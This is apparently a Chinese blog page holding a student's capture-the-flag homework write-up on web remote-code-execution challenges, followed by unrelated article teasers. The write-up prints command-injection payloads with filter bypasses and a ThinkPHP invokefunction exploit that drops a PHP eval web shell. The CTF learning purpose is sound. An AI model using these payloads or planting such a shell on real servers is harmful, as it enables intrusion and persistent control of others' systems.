news 2026/4/15 22:00:23

作业 web rce

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
作业 web rce

25计科秦欢

假期作业

[SWPUCTF 2021 新赛]easyrce

/?url=system(“ls /”); 列出根目录

/?url=system(“cat /flag”);

[SWPUCTF 2021 新生赛]babyrce

打开环境,有代码得,要在控制台中cookie添加一个应用程序

访问得到一个文件,/rasalghul.php接着访问,由代码得出要过滤空格,

?url=ls #列出根目录,

使用$IFS %09 过滤空格

[SWPUCTF 2021 新生赛]finalrce

打开环境发现过滤了很多字符,构建一个文件6.txt

/?url=l\s /|tee 6.txt

然后直接访问文件

要打开flag文件,使用/?url=tac /flllll\aaaaaaggggggg|tee 7.txt

然后直接访问7.txt文件

[SWPUCTF 2022 新生赛]ez_rce

打开环境,发现什么也没有,使用dirseach扫描,发现文件

接着访问文件,当访问到/robots.txt时,发现下面语句

接着访问/NSS/index.php ,要特别注意这里大小写不能错,否则访问不出来

接着搜索图上内容得到解决方法,

接着输入

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>
在输入上面字符

接下就要用到蚁剑了,连接到蚁剑

拿到flag

[SWPUCTF 2023 秋季新生赛]RCE-PLUS

打开环境,根据题目意思发现参数是cmd,使用http://node4.anna.nssctf.cn:28223/?cmd=ls%20/|tee%20a.txt

创建一个文件a.txt,然后访问

然后使用这个/?cmd=cat /f*|tee a.txt,再次访问得到flag

[NISACTF 2022]middlerce

这题使用的是正则匹配的NIF匹配引擎,这个匹配引擎的原理是基于从后往前回溯的匹配机制

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/14 0:33:43

ComfyUI工作流完全掌握:从零开始的完整迁移指南

ComfyUI工作流完全掌握&#xff1a;从零开始的完整迁移指南 【免费下载链接】ComfyUI 最强大且模块化的具有图形/节点界面的稳定扩散GUI。 项目地址: https://gitcode.com/GitHub_Trending/co/ComfyUI 想要轻松管理你的ComfyUI工作流&#xff0c;实现高效的项目迁移和团…

作者头像 李华
网站建设 2026/4/15 6:43:49

Czkawka跨平台重复文件清理工具完整使用手册

Czkawka跨平台重复文件清理工具完整使用手册 【免费下载链接】czkawka 一款跨平台的重复文件查找工具&#xff0c;可用于清理硬盘中的重复文件、相似图片、零字节文件等。它以高效、易用为特点&#xff0c;帮助用户释放存储空间。 项目地址: https://gitcode.com/GitHub_Tren…

作者头像 李华
网站建设 2026/4/15 19:44:19

5分钟搞定文档解析!OpenDataLab MinerU智能文档理解镜像一键部署指南

5分钟搞定文档解析&#xff01;OpenDataLab MinerU智能文档理解镜像一键部署指南 1. 引言&#xff1a;为什么需要智能文档理解&#xff1f; 在当今信息爆炸的时代&#xff0c;PDF、扫描件、PPT 和学术论文构成了企业与科研机构的核心知识资产。然而&#xff0c;这些非结构化文…

作者头像 李华
网站建设 2026/4/12 21:43:23

TextShot:一键截图文字提取,让复制粘贴更智能

TextShot&#xff1a;一键截图文字提取&#xff0c;让复制粘贴更智能 【免费下载链接】textshot Python tool for grabbing text via screenshot 项目地址: https://gitcode.com/gh_mirrors/te/textshot 在日常工作中&#xff0c;你是否经常遇到需要从图片、PDF文档或网…

作者头像 李华
网站建设 2026/4/13 12:07:29

电商智能客服实战:用Qwen2.5-7B-Instruct快速搭建问答系统

电商智能客服实战&#xff1a;用Qwen2.5-7B-Instruct快速搭建问答系统 1. 引言 在电商平台日益激烈的竞争中&#xff0c;客户服务体验已成为影响用户留存和转化率的关键因素。传统人工客服成本高、响应慢&#xff0c;而规则驱动的机器人又难以应对复杂多变的用户问题。随着大…

作者头像 李华
网站建设 2026/4/15 21:51:26

RPCS3模拟器汉化技术深度解析:从原理到实践

RPCS3模拟器汉化技术深度解析&#xff1a;从原理到实践 【免费下载链接】rpcs3 PS3 emulator/debugger 项目地址: https://gitcode.com/GitHub_Trending/rp/rpcs3 技术背景与现实挑战 在数字娱乐领域&#xff0c;语言障碍始终是跨文化游戏体验的主要瓶颈。RPCS3作为目前…

作者头像 李华